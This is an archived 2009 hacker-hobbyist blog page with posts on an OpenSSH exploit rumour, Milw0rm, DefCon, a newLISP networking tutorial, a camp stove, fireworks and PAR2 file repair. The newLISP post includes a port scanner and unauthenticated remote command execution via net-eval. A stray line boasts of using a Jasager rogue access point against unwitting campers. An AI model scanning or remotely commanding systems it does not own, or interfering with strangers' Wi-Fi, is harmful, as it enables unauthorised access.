Remember, this was all rumor to begin with. Analysis of the logs has pretty much proven that they were just doctored to look like something new. This was just a vanilla brute-force attack tool.

The ISC wants everyone to quit spreading FUD. I agree.

I am still uneasy about strange OpenSSH bastardizations with old code being used as "enterprise" SSH implementations, and I still think that creating Google Alerts RSS feeds and pumping them into Google Reader is a great way to track the development of rumors or any kind of breaking news.

Rehi, Milw0rm


I guess enough people stepped up to the plate and offered to resuscitate Milw0rm on Str0ke's behalf. 


This is a good day. Rehi, Milw0rm!

Milw0rm has been up-and-down ever since the closing announcement hit Teh Internets. Probably due to the script kiddies recursively wgetting (downloading a mirror of all the archives)

Hopefully, the site will stabilize and be back online and back to business as usual soon!

DefCon 17

Asmodian X and I will once again make our annual pilgrimage to Las Vegas over the last weekend of July-into-August.


I haven't picked the talks I'm attending yet, but you'll be able to find me at the Podcaster's Meetup and probably a SecurityTwits meetup, if there is one.  Otherwise email me (ax0n ! h-i-r , net) - I'll probably be checking my mail frequently.

Any readers attending?

Not news: smuggling bomb parts into federal buildings

ABC News: Bomb materials smuggled into fed buildings

Federal investigators had no trouble smuggling bomb-making materials past ill-trained and poorly supervised guards at federal buildings, senators were told at a hearing Wednesday.
The thing is that if you poke around the office supply closet and the broom room, you will undoubtedly be able to amass everything that's needed to wreak some serious havoc. 

The article doesn't say whether the GAO agents used credentials or covert entry to get into the compounds with said "bomb supplies". If they were able to enter without credentials, there's a much larger problem. If they used credentials, it really doesn't matter what they can carry in. Through all of history, weapons have been made from seemingly benign objects. 

This is more pedantic security theater: Focusing on one specific threat instead of working to refine and simplify the armor.

2009-07-08

Network programming and distributed scripting with newLISP

I'm not sure why I never re-posted this here, but alas, better late than never.  I should have an article published in the Summer 2009 issue of 2600 as well, but I haven't seen it yet.



newLISP (www.newlisp.org) is a relative newcomer to the interpreted language arena in terms of popularity. While it had its humble beginnings back in 1991 when Lutz Mueller started working on it, only in the last 4 years has development been consistently active.

newLISP is everything that old-school LISP languages are, with a lot of modern features. First off, it's a scripting language that's extremely fast. It has networking ability that's powerful enough to write TCP or UDP client or server applications. Then, to top that off, it has a command called net-eval which makes newLISP stand out from the crowd by giving it the unique ability to easily distribute tasks to other nodes over a network connection.

Binaries (under 200 kilobytes) are available for Windows, BSD, Linux, Mac OS X, Solaris and a host of other platforms. It is released under the GPL. Performance is also second to none. newLISP has been topping the charts on script interpreter benchmarks in several categories thanks to it's small size (under 200 kilobytes) and efficient C code. It outruns php, perl, and even ruby.

newLISP also has some other tricks up its sleeve that make it an excellent system administration scripting language. It has decent filesystem support, so it can see if files or directories exist, determine if a file's permissions are acceptable for reading or writing, and it has very powerful text processing ability using PCRE (perl compatible regular expressions). Finally, it's also worth mentioning that newLISP can easily import whole functions from dynamic libraries such as libmysqlclient (instant MySQL access from within newLISP!), tcl/tk (for creating graphical applications in newLISP) and zlib (for compression and decompression) just to name a few. This makes newLISP one of the most robust and flexible languages around. As you can tell, newLISP is a formidable choice for hackers, geeks, network admins or security professionals wishing to create scripted programs to do network operations or distributed computing with minimal effort

I am lucky to have been able to work directly with Lutz, the founder and creator of newLISP. I got a few direct lessons from him, and from there, started tinkering with it on my own. With that, the first thing I did was create a makeshift port scanner. I learn easiest by example, so here is what I came up with.
Click to see port.lsp

The first part simply assigns the command line arguments into a list called params, then makes sure that 4 parameters were given (program name, host, begin port and ending port). If not, it displays a usage tip before exiting. The second part assigns elements of the list to appropriate variables, then uses a for loop to iterate through the ports, displaying open port numbers that are open. Note that on machines with packet filters that "drop" packets, this port scan will take a very long time. nmap is a much more robust port scanner, however this little script demonstrates the power of newLISP's network commands. We'll run this as a test just for fun:

$ ./port.lsp 192.168.0.105 1 200 
21 open 
22 open 
23 open 
25 open 
79 open 
111 open

Now, let's look into distributed computing, shall we? The core command behind newLISP's distributed computing power -- called "net-eval" -- operates on a list of lists (similar to a 3 dimensional array). The inner-most list is a list of host, port, and a string representing the command(s) you wish to run on the remote node. The outer-most list can contain as many host-port-command lists as your heart desires, allowing you to run many distributed processes at once, and get the results back all at the same time. Then, outside those lists is a timeout in milliseconds. If a result isn't returned in the timeout period, the operation returns "nil" (that is, false). To clarify, net-eval syntax is as follows: 
(net-eval (list (list "host" port-number command-string)) timeout) 

On each remote node, you must have a newLISP listener, which is simply started by running "newlisp -c -d port-number" from the command line. On UNIX environments, you may put an ampersand (&) at the end to launch it in the background, or you may even wish to use "set NOHUP" and log off to leave it running in the background indefinitely. In my example, I went to my Solaris box and launched it, listening on port 31337 as follows: 
$ newlisp -c -d 31337 &

I also launched newLISP listeners on various other machines on my home network, including a few OpenBSD machines, and my wife's MUD/BBS server running Windows Server 2003 with the "Services for UNIX" tools installed. 

Now, care must be taken. It is a bad idea to have a newLISP listener running on a public IP address, because commands like process or exec can launch shell processes on the newLISP node, which is just as good as giving away an unprotected shell account on your network. I advise using newLISP listener nodes only behind a NAT or firewall, or on a segregated network. 

Let's run a test script, shall we? In LISP, boolean and math operations are always performed by placing the operator first, followed by the symbols to apply it to. In addition, the symbols are numbers, but they could easily be strings or lists with some operations. Adding 1 + 2 in LISP is as simple as (+ 1 2) I will start by running a quick addition operation on 1 remote node with a 3000ms (3 second) timeout.
Click to see net-eval-test.lsp 

When we run it, we get the answer to this mind-boggling math problem: 
$ ./net-eval-test.lsp 
(3) 

Now, to expand this even more, I have added three other nodes into the mix, which shows more clearly how the nested list syntax of net-eval works, and I'll demonstrate remote command execution at the same time, using the "exec" command. Notice how the quotes around the command to be run is escaped with backslashes. This is needed to keep from confusing the interpreter. To put quotes inside a quoted string, you need to escape them. This is almost universal to all programming languages. On UNIX-like platforms, uname is used to get information about the operating system and architecture. uname -s -n -m will list the OS that's running, the hostname, and the machine architecture. 

The result is a newLISP list of strings, containing the results of running the command: 

$ ./uname.lsp 
(("SunOS sparky sun4u") ("OpenBSD compy386 i386") ("OpenBSD bouncer sparc") ("Windows mudbbs x86"))

The online documentation for newLISP is very extensive, and features a few rather advanced demonstration scripts, including a working web server written entirely in newLISP. While learning a new programming language is never easy, newLISP is more than mature enough in both implementation and documentation to make it a pretty easy language to add to your list.

Links:
NewLISP Website, full of demonstration newLISP programs, documentation, binaries for many platforms, and newLISP source code:

  • NewLISP.org
  • (newLISPer) is a journal, or blog, written by a guy who was just learning newLISP. It's turned into a bunch of newLISP tutorials with some philosophy tossed in as well:

  • Newlisper Blog ((now unbalanced-parentheses) (you see what I did there?)

    Norman's code snippets is a website full of newLISP programs and snippets for Linux (not tested on other platforms). There is a lot of really interesting applications and widgets available to download:

  • Norman's code Snippets
  • Tracking Rumors (a la the OpenSSH Exploit)

    By now, I'm sure you've all heard the OpenSSH Exploit rumor.  The short and sweet points are:

    • The rumored exploit doesn't work on the current version (5.2/5.2p1 as of writing)
    • The rumored exploit does work against older versions (but we don't know how old or when it got fixed)
    • It's not a bad idea to upgrade your OpenSSH (and derivative) services to OpenSSH 5.2.
    What really concerns me are forks from OpenSSH that are likely to be ubiquitous in the enterprise. There are many, but the following two seem like A Pretty Big Deal to me:
    • Red Hat Enterprise Linux ships with OpenSSH 4.x, but patches it in-house and releases these updates to RHEL users to fix certain bugs as they're fixed in the 5.x series. 
    • Sun Solaris 10 ships with "SunSSH 1.1" which is basically a mash-up based on OpenSSH 3.5p1.
    You see why I'm more than a little concerned, right?   Without having the exploit code to test with, we don't know if the exploit will work against these bastardizations of the OpenSSH code-base.

    Without some solid proof, I'm not going to go to my boss and scream that the sky is falling. I just want to stay in touch with the OpenSSH / 0pwn0wn exploit drama. Google Alerts to the rescue!

    Google Alerts allows you to get rapid-fire email or RSS feed updates when new items show up in Google's index for given search terms. You can use this for vanity searching and a host of other things... or, as I do, to keep an eye on breaking news for more obscure stuff.

    With that, I set up alerts for OpenSSH (News and Blogs) and 0pen0wn (Comprehensive search) - If an exploit is released publicly, I want to know about it so that I can test it and make recommendations on how to fix it.

    Also, it's not a bad idea to set up google alerts for other mission-critical products or services you rely on, if for nothing else, to keep your fingers on their pulse.

    Improvised backpacking stove

    Squarely in the "Other interesting topics" category for this site, I can tie all this summer fun back to hacking a little bit. This is about improvising a little bit to solve a problem. It's also about trade-offs, fire, and building stuff in a cheap and hackish nature. So there. With that out of the way, this post will have almost nothing to do with technology.

    I love camping, and usually when I go camping with family and friends, it's the all-out party at the lake kind of camping, just short of sleeping in an RV. I can tether my LG Chocolate to my MacBook, plug in my La Fonera running Jasager to mess with WiFi-toting campers, keep everything charged with the inverter and still start fires for the sake of fire -- because God knows you don't need a bonfire to cook when you have a nice propane stove hooked up to a 20-pound gas-grill propane tank! Sights like this one (from Memorial Day Weekend) aren't uncommon:


    More recently, though, I've tried to get myself back into a more stripped-down backpacking mode. It's no secret that I like riding my bicycle for basic transportation. It also happens that there are decent campgrounds close enough to home for me to ride my bicycle to. For an adventure like this, the goal is to pack light (kind of like backpacking) -- In fact, the weekend after the above photo was taken, I snapped this -- which should give you some idea of how much crap I had to haul for a one-night "backpacking" adventure on my bicycle:


    This is a 17-ounce (or so) propane tank and my small propane burner which I brought along on my last trip. It's definitely better than the 30-pound rig we were using a week prior. The bonus is that it still boils water in well under 5 minutes and makes fried eggs for breakfast like an ace.


    I have a similar trip coming up in about 3 weeks, and over the past few days, I've been contemplating various ways to minimize the bulk. The wretched camp stove above is pretty much the only thing I can downsize cheaply. Sure, I could ditch some of my older, heavier gear and buy a $60 camp pad and a $250 tent -- No thanks. I'm on a budget, and that kind of money would be better spent on say... plane tickets to DefCon?

    I decided to try going the sterno route. We have a can of it laying around, so what could it hurt? The main problems with sterno are that it doesn't get as hot as propane, and that the can itself won't support your cookware. I had some old bicycle spokes laying around and made this little contraption. It's two spokes (of different lengths) bent up and strapped together with tape on one edge. It folds nicely, but not totally flat. If I had spokes of the same length (or if I just cut the longer one, or wasn't afraid of bending the longer one so it is directly in the flame's path) it would fold flat.

    I bent this so that it would hold the cookware about 1" above the fuel canister. It's so simple that I really don't think you need a full set of instructions to replicate what I did here. You can cut and re-bend a wire hanger, get some thick solid-core copper wire, or improvise whatever you want. Three level points are all you need to support a kettle over the heat source


    With the sterno can in place -- and set up on a piece of my mess kit so I don't melt the counter and incite the wrath of my l33t wife -- it looks like this:


    Now for the sucky part: In order to boil two cups of water (for example, to make French Pressed Coffee or re-constitute a freeze-dried backpacking meal), it takes between 10-15 minutes depending on conditions, and yes I had the lid on whilst attempting to bring this water to a boil.


    One cool thing, though, is that this stove stand will work nice with many other kinds of improvised heat sources. I may just end up replacing the sterno can with a beer-can alcohol stove. That's another project for another evening, though.

    2009-07-07

    Fare thee well, Milw0rm



    Str0ke is apparently abandoning Milw0rm:

    Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.
    Be safe, /str0ke
    Milw0rm was (and for the time being, still is) a site with a simple interface to browse a vast, extensive library of exploit code that was until now quite frequently updated. For the time being, it looks like the site is still up, but it sounds like str0ke has stopped trying to add more submissions to the site. Time will tell if he keeps the page alive.

    It is survived by Packet Storm and a few other fragmented archives. Nothing quite matches the pedantic focus of Milw0rm, though. You will be missed!

    Hat tip: A bunch of the security twits were discussing this.

    2009-07-06

    Annual gathering of pyromaniacs

    As usual, The HiR crew participated in massive amount of explosives and fire for Independence Day. While we didn't have professional-grade stuff like last year, we all actually got to set off a bunch of smaller things. And I mean a bunch.


    Frogman is actually made of explosives. :)


    A few repeater cakes (pre-fused multi-shot aerial displays) staged in the yard.


    Frogman, Dicegrrl and Asmodian X setting up a few bottle rockets.


    This made me laugh, particuarly seeing Frogman cheer as the projectile launched. I made it from a sequence of images taken with an intervalometer script on my camera (thanks to CHDK)


    Dicegrrl shows off her Twitter Glitter. By the way, this was just about the most underwhelming piece of the night, aside from one ironically called "The Migraine". Both of them were basically a 4-shot roman candle. At least Twitter Glitter could be described in 140 characters or less.


    Crackle.


    Boom.










    2009-07-05

    Sysadmin Sunday: Guard against file corruption with PAR

    Introduction:
    Bit rot, File corruption, partial file transfer, call it what you will, digital transmission mediums some times fail and you are left with a corrupted fragment of data if any at all. In the case of large files in which re-transmission would take hours or days, this is a tough situation.

    PAR uses a RAID like technique to salvage corrupted files in most cases only needing to obtain files containing restore information that are a fraction of the size of the original file.

    This article is intended for people with basic to intermediate understanding of a un*x style operating system.

    -=-=-=-=-=-=-=-=-=-=-=-=-=-

    Table of contents:
    1. PAR and the Reed-Solomon error correction algorithm
    2. Available applications based off of PAR
    3. Examples
    4. Informative resources

    -=-=-=-=-=-=-=-=-=-=-=-=-=-
    1. PAR and the Reed-Solomon error correction algorithm

    The Reed-Solomon algorithm was developed in 1960 by Irving S. Reed and Gustave Solomon. It is used in many technologies such as CD's, BlueRay, DSL Modems, RAID6 and more. This method of error correction is used to protect against certain forms of media defects or data transmition errors.

    The PAR utility was developed by Tobias Rieper and Stefan Wehlus for the purpose of recovering corrupted files and file fragments from Usenet posts with out needing to download the file all over again. Later, to compensate for some limitations of PAR, the PAR2 specification was developed by Michael Nahas and Peter Clements. Clements then wrote some of the first PAR2 applications.

    A simple way of explaining what PAR does is that it takes the original source files then applies the mathematical algorithm to it which contains a sort of processed description of what that file looks like. Then lets say you send someone a file but for some reason the transmission fails mid way through the file transmission. All that needs to be done is to download the results of the mathematical operation (which are significantly smaller than the original file) and run the par utility to apply the math to the file fragment. Par can fill in the blanks using the algorithm and restore the the file.

    2. Available applications based off of PAR
    There is of course the fore-mentioned open source application written by Peter Clements et all. There are a slew of other PAR clients for Mac, OS 9 and 10, Windows, Linux, BSD and more. Though the PAR1 specifications are incompatible with the PAR2 specification most clients support both formats side by side. For a detailed list of PAR compliant projects check out the Parchive sourceforge website. If you are using Linux, you can either download a Linux rpm or source tarball from the sourceforge site . Or use a package system such as apt-get to download it from your distributions package archives.

    3. Examples
    In this example I am using Ubuntu Linux.

    1. This will require the Ubuntu Universe repository. You can uncomment this in "/etc/apt/sources.list" using "sudo vi /etc/apt/sources.list".
    2. Then update your sources using "sudo apt-get update".
    3. Finally get the par2 package using "sudo apt-get install par2" .
    Now lets test par2 to see if it can recover a file:
    1. Using dd create a 10MB test data file from /dev/zero "dd if=/dev/zero of=/tmp/testdata.bin bs=1024 count=10240"
    2. Then create our par2 file and recovery blocks: "par2 create testdata.par2 testdata.bin"
    3. Now im going to copy the original data to a different name then make some changes to it.
    4. Then I run "par2 verify testdata.par2 testdata.bin"
    5. par2 tells me that I need one recovery block to repair the file. (* during the create process par2 created several repair blocks. Since par2 over-samples, I can use the either the largest repair file or a combination of the smaller files for the same effect.) In this case I just need to have the repair block file called testdata.vol000+01.par2 in the same directory.
    6. I then type in "par2 repair testdata.par2 testdata.bin" where it then reports that the file has been repaired.
    4. Informative resources
    Clements,Peter Gallagher,Ryan Nahas,Mike et. all. "Parity Archive Volume Set: File
    Specification, Clients, and Related Resources" (Accessed July 2009)
    http://parchive.sourceforge.net/

    Wikipedia.org "Reed-Solomon Error Correction" (Accessed July 2009).
    http://en.wikipedia.org/wiki/Reed%E2%80%93Solomon_error_correction

    Wikipedia.org "Parchive" (Accessed July 2009).
    http://en.wikipedia.org/wiki/Parchive